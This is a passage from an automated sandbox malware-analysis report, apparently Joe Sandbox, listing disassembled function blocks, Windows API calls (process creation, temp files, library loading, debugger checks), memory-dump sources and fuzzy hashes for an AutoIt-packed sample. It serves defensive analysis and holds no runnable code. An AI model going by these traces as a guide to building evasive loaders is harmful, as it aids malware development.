                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 87862bf1e1e164ef6e8179e8b10cd36975ac6276b135bd8e4540f1895ffd60a4
                                          • Instruction ID: 4156e01fd4a9967cd1a442edb66db421670807d247310775fcdfcd7cb5c48899
                                          • Opcode Fuzzy Hash: 87862bf1e1e164ef6e8179e8b10cd36975ac6276b135bd8e4540f1895ffd60a4
                                          • Instruction Fuzzy Hash: 6501F971804218BEDB28C6A8D81AEFE7BF8DB01311F00819BF652D2181E5B5A604CB70
                                          APIs
                                            • Part of subcall function 00DF594C: __FF_MSGBANNER.LIBCMT ref: 00DF5963
                                            • Part of subcall function 00DF594C: __NMSG_WRITE.LIBCMT ref: 00DF596A
                                            • Part of subcall function 00DF594C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001), ref: 00DF598F
                                          • std::exception::exception.LIBCMT ref: 00DF102C
                                          • __CxxThrowException@8.LIBCMT ref: 00DF1041
                                            • Part of subcall function 00DF87DB: RaiseException.KERNEL32(?,?,00000000,00E8BAF8,?,00000001,?,?,?,00DF1046,00000000,00E8BAF8,00DD9FEC,00000001), ref: 00DF8830
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID: bad allocation
                                          • API String ID: 3902256705-2104205924
                                          • Opcode ID: 2325750f4f623ddb5c55ad8711012faf8eb7dce2d2aea2da26c6456520d70dc0
                                          • Instruction ID: 0c9b6a824f78b84f4b42cc0837c603ab27e198cbcb6ae3ad06fbb246775a3663
                                          • Opcode Fuzzy Hash: 2325750f4f623ddb5c55ad8711012faf8eb7dce2d2aea2da26c6456520d70dc0
                                          • Instruction Fuzzy Hash: 5DF0F93554020DB6CB20BA54EC029FF77A8DF00391F118015FB04A2141DFB08A8096B1
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01153CAD
                                          • ExitProcess.KERNEL32(00000000), ref: 01153CCC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID: D
                                          • API String ID: 126409537-2746444292
                                          • Opcode ID: 9f0fea074abf0f39dd8420fc00d89007b68beb3d91da31db31286a021e466f34
                                          • Instruction ID: 5ab27edc308e11d43142687723f0ad06506fd7e7267649182d82997f997ec8f7
                                          • Opcode Fuzzy Hash: 9f0fea074abf0f39dd8420fc00d89007b68beb3d91da31db31286a021e466f34
                                          • Instruction Fuzzy Hash: EAF0ECB154024CEBDBA4EFE0CC49FEE7779BF04701F408509FA2A9A180DB7496088B61
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00E39B82
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E39B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 8714c7e66474a4f50db06aa8f08569a9a74cd7b5c24dd171b653bd54813afa93
                                          • Instruction ID: efd47eff8e6e670035dc8236a0b6f5ee92e0c18ad8a20fd623344bcc8764f602
                                          • Opcode Fuzzy Hash: 8714c7e66474a4f50db06aa8f08569a9a74cd7b5c24dd171b653bd54813afa93
                                          • Instruction Fuzzy Hash: 3DD05EB954030DAFDF10AB90DC0EF9A772CE704702F0046B1FE68A60A1EEB055988B92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71927cda7c4debd2c32b9a0ed17853d3205ca28151706236da4c51bae8109f64
                                          • Instruction ID: 32426d38ee1f3f822293fefd24f4f2925b2e798be110ead193f5eb042b4561f3
                                          • Opcode Fuzzy Hash: 71927cda7c4debd2c32b9a0ed17853d3205ca28151706236da4c51bae8109f64
                                          • Instruction Fuzzy Hash: E8F16971A083019FC714DF28D880A6ABBE5FF88314F14992EF899AB351D771E945CF92
                                          APIs
                                          • _memset.LIBCMT ref: 00DD4401
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DD44A6
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DD44C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 5df90563f4a3c710213f68d94f7b1d536acab32b0eb9a9537c5143f4bae7ec1d
                                          • Instruction ID: a8b2510cd069e6d87307463aab886b9ef53942d6458fe7e6ca8725e6a70db173
                                          • Opcode Fuzzy Hash: 5df90563f4a3c710213f68d94f7b1d536acab32b0eb9a9537c5143f4bae7ec1d
                                          • Instruction Fuzzy Hash: 1E315EB05047019FD760DF65D88469BBBE8FB48308F04092FF59A93391D7B5A988CBA2
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00DF5963
                                            • Part of subcall function 00DFA3AB: __NMSG_WRITE.LIBCMT ref: 00DFA3D2
                                            • Part of subcall function 00DFA3AB: __NMSG_WRITE.LIBCMT ref: 00DFA3DC
                                          • __NMSG_WRITE.LIBCMT ref: 00DF596A
                                            • Part of subcall function 00DFA408: GetModuleFileNameW.KERNEL32(00000000,00E943BA,00000104,00000000,00000001,00000000), ref: 00DFA49A
                                            • Part of subcall function 00DFA408: ___crtMessageBoxW.LIBCMT ref: 00DFA548
                                            • Part of subcall function 00DF32DF: ___crtCorExitProcess.LIBCMT ref: 00DF32E5
                                            • Part of subcall function 00DF32DF: ExitProcess.KERNEL32 ref: 00DF32EE
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          • RtlAllocateHeap.NTDLL(00F60000,00000000,00000001), ref: 00DF598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: dff0a850a79836edb8379a259e3a895b07acb43cbc0ac8493221b520bfb23d9c
                                          • Instruction ID: 2ac14246239511b1c3917a65a1b2544f0d9a7821cd913f63e09b988c4be72a5e
                                          • Opcode Fuzzy Hash: dff0a850a79836edb8379a259e3a895b07acb43cbc0ac8493221b520bfb23d9c
                                          • Instruction Fuzzy Hash: 7A01C471301B1EDED6296765EC41A3D7288DF41731F57C02AF705AA1D1DAB09D014A71
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E397D2,?,?,?,?,?,00000004), ref: 00E39B45
                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E39B5B
                                          • CloseHandle.KERNEL32(00000000,?,00E397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E39B62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: 6226584a544f1283ed008f18720e2e8beeef006db708db771f0a85131ded208b
                                          • Instruction ID: 08dc9f30d92a6401d096c6242c1ae64942f1e9d81a179f232926ef61ca1cc134
                                          • Opcode Fuzzy Hash: 6226584a544f1283ed008f18720e2e8beeef006db708db771f0a85131ded208b
                                          • Instruction Fuzzy Hash: 0DE08632181714BBE7212B55EC09FCA7F18AB05766F104620FB54B90E187B125159798
                                          APIs
                                          • _free.LIBCMT ref: 00E38FA5
                                            • Part of subcall function 00DF2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DF9C64), ref: 00DF2FA9
                                            • Part of subcall function 00DF2F95: GetLastError.KERNEL32(00000000,?,00DF9C64), ref: 00DF2FBB
                                          • _free.LIBCMT ref: 00E38FB6
                                          • _free.LIBCMT ref: 00E38FC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                          • Instruction ID: 022441c661219bea9b9f4b16758775f89850a9bd46d35f93c25b70f914d61831
                                          • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                          • Instruction Fuzzy Hash: 40E012B17197094ACA24A579AE44AB36BFE9F48358B19181DB509EB142DE24E841C534
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 01f8a560978e348396e6adf6d7e9231569971452d34ee891f2bcded552c5d3f5
                                          • Instruction ID: e5d6dba61919d81e0c27ef39c10ed78f092fdaf5add2bdc2215680229ba605c7
                                          • Opcode Fuzzy Hash: 01f8a560978e348396e6adf6d7e9231569971452d34ee891f2bcded552c5d3f5
                                          • Instruction Fuzzy Hash: D8226774608341DFC724DF18C490A6ABBE1FF84304F19895EE8969B362D771ED85CBA2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 144f4f6f86792f63c0b12f950643615dc0b10619876d46ecf705f140cfd4c05b
                                          • Instruction ID: 301d0248d2f89123d9bf7d6aa1f70b15d8f3a564f6e631b60852c896f8725f82
                                          • Opcode Fuzzy Hash: 144f4f6f86792f63c0b12f950643615dc0b10619876d46ecf705f140cfd4c05b
                                          • Instruction Fuzzy Hash: 8C31C5B1614506AFC714DF2CD8D1E69F7A9FF48320719866AE915CB391EB70E860CBB0
                                          APIs
                                          • 745AC8D0.UXTHEME ref: 00DD4992
                                            • Part of subcall function 00DF35AC: __lock.LIBCMT ref: 00DF35B2
                                            • Part of subcall function 00DF35AC: RtlDecodePointer.NTDLL(00000001), ref: 00DF35BE
                                            • Part of subcall function 00DF35AC: RtlEncodePointer.NTDLL(?), ref: 00DF35C9
                                            • Part of subcall function 00DD4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DD4A73
                                            • Part of subcall function 00DD4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DD4A88
                                            • Part of subcall function 00DD3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD3B7A
                                            • Part of subcall function 00DD3B4C: IsDebuggerPresent.KERNEL32 ref: 00DD3B8C
                                            • Part of subcall function 00DD3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E962F8,00E962E0,?,?), ref: 00DD3BFD
                                            • Part of subcall function 00DD3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00DD3C81
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DD49D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                          • String ID:
                                          • API String ID: 2688871447-0
                                          • Opcode ID: f3c9fab7af645dc3aba73b234e11d59407c866f89da2d8729e2fbb5d71a8cdd9
                                          • Instruction ID: ede8016c0069b7adddfb586fbdb20e693e612daa81b7156382356e6f1db2509e
                                          • Opcode Fuzzy Hash: f3c9fab7af645dc3aba73b234e11d59407c866f89da2d8729e2fbb5d71a8cdd9
                                          • Instruction Fuzzy Hash: 2B118C719183119FC700EF2AEC0591AFBE8EF98710F00891FF095A72B1DB709549CBA6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          APIs
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          • __lock_file.LIBCMT ref: 00DF561B
                                            • Part of subcall function 00DF6E4E: __lock.LIBCMT ref: 00DF6E71
                                          • __fclose_nolock.LIBCMT ref: 00DF5626
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          APIs
                                            • Part of subcall function 01153548: GetFileAttributesW.KERNELBASE(?), ref: 01153553
                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01153E46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 3401506121-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          APIs
                                            • Part of subcall function 00DD4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DD4D4D
                                            • Part of subcall function 00DF548B: __wfsopen.LIBCMT ref: 00DF5496
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4F6F
                                            • Part of subcall function 00DD4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DD4D02
                                            • Part of subcall function 00DD4DD0: _memmove.LIBCMT ref: 00DD4E1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          APIs
                                          • __lock_file.LIBCMT ref: 00DF4AD6
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,00E962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DD4FDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DF09F4
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 01153553
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?), ref: 01153523
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 01154F59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 01154F59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00E5CE50
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E5CE91
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E5CED6
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E5CF00
                                          • SendMessageW.USER32 ref: 00E5CF29
                                          • _wcsncpy.LIBCMT ref: 00E5CFA1
                                          • GetKeyState.USER32(00000011), ref: 00E5CFC2
                                          • GetKeyState.USER32(00000009), ref: 00E5CFCF
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E5CFE5
                                          • GetKeyState.USER32(00000010), ref: 00E5CFEF
